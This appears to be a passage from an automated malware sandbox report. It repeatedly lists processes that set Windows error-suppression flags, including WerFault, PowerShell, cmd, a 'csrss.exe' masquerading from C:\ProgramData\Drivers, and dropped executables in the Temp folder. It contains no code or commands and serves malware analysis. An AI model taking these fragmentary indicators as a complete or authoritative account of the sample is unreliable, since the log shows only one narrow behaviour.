Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1DCB.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
